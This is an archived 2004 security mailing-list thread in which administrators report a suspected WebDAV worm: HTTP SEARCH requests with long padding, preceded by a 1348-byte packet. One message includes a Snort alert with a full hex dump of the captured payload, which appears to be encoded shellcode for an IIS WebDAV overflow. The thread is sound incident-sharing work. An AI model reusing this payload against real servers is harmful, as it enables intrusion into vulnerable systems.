RE: WebDav Worm?

From: Andy Patrick (andy.patrick_at_summitcreditunion.com)
Date: 02/13/04

  • Next message: Brian Eckman: "Re: WebDav Worm?"
    To: "'Keith T. Morgan'" <keith.morgan@terradon.com>, incidents@securityfocus.com
    Date: Fri, 13 Feb 2004 15:40:46 -0600
    
    

    Agreed, I've seen the exact same pattern from 7 different source IPs in the
    past 24 hours.
    All source IPs appear to be DSL or cable modem, FWIW.

    First time I saw it was 02/09.

    Andy Patrick, GCIA, CCNA

    -----Original Message-----
    From: Keith T. Morgan [mailto:keith.morgan@terradon.com]
    Sent: Friday, February 13, 2004 9:40 AM
    To: incidents@securityfocus.com
    Subject: WebDav Worm?

    Maybe this is old news, or maybe it's scanning pattern is just now
    making it to my netblocks, but we're seeing a massive increase in http
    connections asking for SEARCH
    /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA on most
    of our web servers. Each one is preceeded by a packet with a 1348 byte
    payload containing a mix of what appears to be unicode followed by what
    appears to be psuedo random ascii padding. An example of one of these
    is included below.

    Has anyone else been seeing this type of activity increasing? We've
    been seeing so much of it that I have to wonder if it's a worm. The
    volume's a little too high for skr1pt k1dd13 activity, unless there
    happens to be a whole bunch of them using the same tool in the same
    manner at the same time.

    Generated by ACID v0.9.6b23 on Fri, 13 Feb 2004 10:35:21 -0500

    ------------------------------------------------------------------------
    ------
    #(3 - 80410) [2004-02-13 10:26:24] [snort/3] (http\_inspect) U ENCODING

    IPv4: 68.159.96.244 -> obfuscated.subnet.x.90
          hlen=5 TOS=0 dlen=1400 ID=60451 flags=0 offset=0 TTL=114
    chksum=46430
    TCP: port=3886 -> dport: 80 flags=***A**** seq=1267955380
          ack=1080397795 off=8 res=0 win=65535 urp=0 chksum=27866
          Options:
           #1 - NOP len=0
           #2 - NOP len=0
           #3 - TS len=8 data=0008FB5B00000000
    Payload: length = 1348

    000 : 25 75 35 39 35 31 25 75 36 38 34 31 25 75 37 35 %u5951%u6841%u75
    010 : 33 33 25 75 30 30 31 38 25 75 37 35 34 46 25 75 33%u0018%u754F%u
    020 : 37 34 30 35 25 75 34 45 30 33 25 75 34 46 43 33 7405%u4E03%u4FC3
    030 : 25 75 39 30 35 33 25 75 36 36 35 45 25 75 34 45 %u9053%u665E%u4E
    040 : 41 44 25 75 34 46 34 36 25 75 36 36 34 33 25 75 AD%u4F46%u6643%u
    050 : 39 37 33 44 25 75 39 30 36 46 25 75 39 30 35 31 973D%u906F%u9051
    060 : 25 75 37 35 35 39 25 75 35 33 46 30 25 75 35 46 %u7559%u53F0%u5F
    070 : 35 36 25 75 35 37 34 41 25 75 36 36 34 33 25 75 56%u574A%u6643%u
    080 : 35 30 41 44 25 75 36 36 34 33 25 75 34 46 33 44 50AD%u6643%u4F3D
    090 : 25 75 39 30 30 30 25 75 37 34 35 39 25 75 34 45 %u9000%u7459%u4E
    0a0 : 44 39 25 75 36 34 32 43 25 75 35 39 35 30 25 75 D9%u642C%u5950%u
    0b0 : 34 46 34 36 25 75 39 30 34 37 25 75 36 36 34 33 4F46%u9047%u6643
    0c0 : 25 75 35 30 41 44 25 75 35 38 34 42 25 75 36 34 %u50AD%u584B%u64
    0d0 : 32 43 25 75 35 37 34 41 25 75 39 30 35 31 25 75 2C%u574A%u9051%u
    0e0 : 35 46 39 30 25 75 46 46 30 33 25 75 46 46 30 33 5F90%uFF03%uFF03
    0f0 : 25 75 46 46 30 33 25 75 46 46 30 33 25 75 30 33 %uFF03%uFF03%u03
    100 : 39 31 25 75 39 31 43 46 25 75 35 46 39 30 25 75 91%u91CF%u5F90%u
    110 : 39 30 41 41 25 75 37 34 34 31 25 75 39 30 43 41 90AA%u7441%u90CA
    120 : 25 75 39 30 35 31 25 75 37 35 35 39 25 75 34 45 %u9051%u7559%u4E
    130 : 43 34 25 75 36 46 39 37 72 6D 6F 6D 64 64 64 64 C4%u6F97rmomdddd
    140 : 64 64 69 73 6A 68 6E 65 67 64 64 64 64 64 64 64 ddisjhnegddddddd
    150 : 6C 6F 68 64 64 70 6C 6F 6B 64 65 70 6E 71 6C 6F lohddplokdepnqlo
    160 : 6A 6C 64 6C 6C 6F 73 6B 6A 6E 64 69 69 6D 72 6C jldlloskjndiimrl
    170 : 69 6D 64 64 64 64 64 64 72 66 73 6D 6C 67 72 70 imddddddrfsmlgrp
    180 : 65 68 67 67 70 64 69 64 6A 6C 66 72 6A 69 6B 6C ehggpdidjlfrjikl
    190 : 6A 69 6A 6C 6A 6C 6A 73 6B 67 6B 68 6A 6C 69 70 jijljljskgkhjlip
    1a0 : 6B 67 6B 6A 6A 67 6C 6F 71 70 69 64 6A 6E 64 6A kgkjjgloqpidjndj
    1b0 : 6A 6E 64 66 69 64 69 64 6A 6C 64 64 64 64 64 64 jndfididjldddddd
    1c0 : 68 64 69 67 73 73 65 6A 6C 67 73 6C 73 73 6B 68 hdigssejlgslsskh
    1d0 : 66 6D 6C 6F 73 6C 6A 6E 64 64 6C 6F 70 6A 6C 67 fmlosljnddlopjlg
    1e0 : 70 64 65 6C 69 64 6C 6F 69 6C 73 70 69 67 6C 67 pdelidloilspiglg
    1f0 : 70 64 64 68 69 64 69 6B 73 73 69 6A 64 68 69 64 pddhidikssijdhid
    200 : 69 6B 73 73 69 6A 64 6C 69 6C 6C 69 70 64 6B 68 ikssijdlillipdkh
    210 : 64 6D 6C 6F 71 70 67 67 70 64 69 64 69 67 73 73 dmloqpggpdidigss
    220 : 69 6A 64 70 73 73 69 6A 65 64 69 65 69 6A 6C 6F ijdpssijedieijlo
    230 : 68 69 67 70 6C 6F 69 68 66 6C 6B 6C 64 67 71 69 higploihflkldgqi
    240 : 69 66 6C 6F 6B 66 66 64 64 67 73 69 67 67 70 6D iflokffddgsiggpm
    250 : 68 6D 68 65 6E 71 64 67 70 69 67 67 71 6F 64 73 hmhenqdgpiggqods
    260 : 6F 72 65 64 67 6E 71 6A 6B 68 64 6C 70 65 70 6F oredgnqjkhdlpepo
    270 : 64 71 64 67 71 6E 68 64 72 6F 73 65 67 6F 65 73 dqdgqnhdrosegoes
    280 : 6B 69 72 6B 69 6E 6C 6F 69 6E 66 68 64 67 71 71 kirkinloinfhdgqq
    290 : 6A 6A 6C 6F 64 70 68 6F 6C 6F 69 6E 65 70 64 67 jjlodpholoinepdg
    2a0 : 71 71 6C 6F 64 68 6C 6F 64 67 70 69 6E 6F 69 72 qqlodhlodgpinoir
    2b0 : 69 6D 70 67 72 6C 68 66 73 73 73 73 73 73 6E 69 impgrlhfssssssni
    2c0 : 65 6B 64 64 6B 70 65 73 6B 6D 64 6E 72 6C 73 6F ekddkpeskmdnrlso
    2d0 : 6D 6B 73 71 64 73 6D 6C 73 72 6C 6E 64 72 72 73 mksqdsmlsrlndrrs
    2e0 : 70 72 72 64 6A 64 64 64 67 66 64 64 64 64 64 64 prrdjdddgfdddddd
    2f0 : 64 64 64 64 64 64 68 71 69 6E 6D 64 64 64 64 67 ddddddhqinmddddg
    300 : 64 64 64 64 64 64 64 68 64 64 64 64 64 64 73 73 dddddddhddddddss
    310 : 73 73 64 64 64 64 6F 6C 64 64 64 64 64 64 64 64 ssddddoldddddddd
    320 : 64 64 64 64 64 64 68 64 64 64 64 64 64 64 64 64 ddddddhddddddddd
    330 : 64 64 64 64 64 64 64 64 64 64 64 64 64 64 64 64 dddddddddddddddd
    340 : 64 64 64 64 64 64 64 64 64 64 64 64 64 64 64 64 dddddddddddddddd
    350 : 64 64 64 64 64 64 64 64 64 64 64 64 64 64 64 64 dddddddddddddddd
    360 : 64 64 64 64 64 64 64 64 64 64 64 64 64 64 72 6C ddddddddddddddrl
    370 : 64 64 64 64 64 64 64 72 65 73 6F 6E 64 72 64 64 dddddddresondrdd
    380 : 6F 68 64 6D 70 71 66 65 6F 6C 64 65 68 70 70 71 ohdmpqfeoldehppq
    390 : 66 65 69 68 6A 6C 6A 6D 6B 67 66 64 6B 64 6B 66 feihjljmkgfdkdkf
    3a0 : 6A 73 6A 6B 6B 66 6A 65 6A 71 66 64 6A 67 6A 65 jsjkkfjejqfdjgje
    3b0 : 6A 72 6A 72 6A 73 6B 68 66 64 6A 66 6A 69 66 64 jrjrjskhfdjfjifd
    3c0 : 6B 66 6B 69 6A 72 66 64 6A 6D 6A 72 66 64 68 68 kfkijrfdjmjrfdhh
    3d0 : 68 73 69 67 66 64 6A 71 6A 73 6A 68 6A 69 66 72 hsigfdjqjsjhjifr
    3e0 : 64 71 64 71 64 6E 66 68 64 64 64 64 64 64 64 64 dqdqdnfhdddddddd
    3f0 : 64 64 64 64 64 64 6E 69 67 6C 64 69 70 6B 72 65 ddddddnigldipkre
    400 : 69 6D 6A 6F 6D 68 72 65 69 6D 6A 6F 6D 68 72 65 imjomhreimjomhre
    410 : 69 6D 6A 6F 6D 68 6D 6E 68 69 6A 6B 6D 68 72 67 imjomhmnhijkmhrg
    420 : 69 6D 6A 6F 6D 68 6A 66 68 69 6A 69 6D 68 72 67 imjomhjfhijimhrg
    430 : 69 6D 6A 6F 6D 68 6C 72 68 6A 6A 65 6D 68 72 6E imjomhlrhjjemhrn
    440 : 69 6D 6A 6F 6D 68 6C 72 68 6A 6A 73 6D 68 72 67 imjomhlrhjjsmhrg
    450 : 69 6D 6A 6F 6D 68 72 65 69 6D 6A 6E 6D 68 6C 6A imjomhreimjnmhlj
    460 : 69 6D 6A 6F 6D 68 6A 66 69 65 67 6A 6D 68 72 6C imjomhjfiegjmhrl
    470 : 69 6D 6A 6F 6D 68 72 6B 6B 6E 6A 64 6D 68 72 64 imjomhrkknjdmhrd
    480 : 69 6D 6A 6F 6D 68 69 66 6A 6D 6A 67 6A 6C 72 65 imjomhifjmjgjlre
    490 : 69 6D 6A 6F 6D 68 64 64 64 64 64 64 64 64 64 64 imjomhdddddddddd
    4a0 : 64 64 64 64 64 64 64 64 64 64 64 64 64 64 64 64 dddddddddddddddd
    4b0 : 64 64 64 64 64 64 64 64 64 64 64 64 64 64 64 64 dddddddddddddddd
    4c0 : 64 64 64 64 64 64 69 64 68 69 64 64 64 64 68 70 ddddddidhiddddhp
    4d0 : 64 65 64 67 64 64 70 70 73 70 71 64 71 6D 64 64 dedgddppspqdqmdd
    4e0 : 64 64 64 64 64 64 64 64 64 64 64 64 64 64 72 64 ddddddddddddddrd
    4f0 : 64 64 64 73 64 65 64 6F 64 65 66 65 68 73 64 64 dddsdedodefehsdd
    500 : 67 64 64 64 64 64 64 64 65 64 64 64 64 64 64 64 gdddddddeddddddd
    510 : 6D 64 64 64 64 64 6E 64 70 6E 64 64 64 64 64 64 mdddddndpndddddd
    520 : 6E 64 64 64 64 64 64 64 71 64 64 64 64 64 64 64 ndddddddqddddddd
    530 : 64 64 68 64 64 64 64 64 65 64 64 64 64 64 64 64 ddhdddddeddddddd
    540 : 64 66 64 64 dfdd

    ****************************************************************************
    **********************
    The contents of this email and any attachments are confidential.
    It is intended for the named recipient(s) only.
    If you have received this email in error please notify the system manager or
    the
    sender immediately and do not disclose the contents to anyone or make
    copies.

    ** this message has been scanned for viruses, vandals and malicious content
    **
    ****************************************************************************
    **********************

    ---------------------------------------------------------------------------
    Free trial: Astaro Security Linux -- firewall with Spam/Virus Protection

    Protect your network with the comprehensive security solution that
    integrates six applications for ease of use and lower TCO.

    Firewall - Virus protection - Spam protection - URL blocking - VPN
    - Wireless security.

    Download 30-day evaluation at:
    http://www.astaro.com/php/contact/securityfocus.php
    ----------------------------------------------------------------------------

    ---------------------------------------------------------------------------
    Free trial: Astaro Security Linux -- firewall with Spam/Virus Protection

    Protect your network with the comprehensive security solution that
    integrates six applications for ease of use and lower TCO.

    Firewall - Virus protection - Spam protection - URL blocking - VPN
    - Wireless security.

    Download 30-day evaluation at:
    http://www.astaro.com/php/contact/securityfocus.php
    ----------------------------------------------------------------------------


  • Next message: Brian Eckman: "Re: WebDav Worm?"

    Relevant Pages

    • Fraud Roshambo: Paper Beats RFID
      ... Fingerprints aren't just for fingers anymore. ... piece of paper, the light is scattered, producing a pattern of light ... the unique speckle pattern of a sheet of paper remains ... expert on security at Comter Systems. ...
      (comp.dcom.telecom)
    • Re: updates wont download (timeout)
      ... I went to try and get windows updates, I can view the updates but the downloading of the updates times out. ... Either the security software is causing the updating issues, there's malware resident, the networking componentis damaged by either of the previous two, the OS is damaged by same, or, there's an issue with the network. ... Suggest you download an offline scanning component to another system and use portable media to tansfer it to the affected system. ... The Controlled Pattern Release is pushed out prior to the daily Virus Pattern Files and can *on rare occassions*, ...
      (microsoft.public.windowsupdate)
    • RE: Life After CISSP?
      ... Subject: Life After CISSP? ... The contents of this email and any attachments to it may contain ... Astaro Security Linux -- firewall with Spam/Virus Protection ...
      (Security-Basics)
    • Re: pen testing & obfuscated shell code
      ... sleds) is that there are at least 2 ways of producing the same opcodes on Intel systems. ... Astaro Security Linux -- firewall with Spam/Virus Protection ...
      (Pen-Test)
    • RE: Preventing OS Detection
      ... Once you've gotten your network packets tweaked so ... If I go to http://uptime.netcraft.com and enter my website, ... Astaro Security Linux -- firewall with Spam/Virus Protection ...
      (Focus-Microsoft)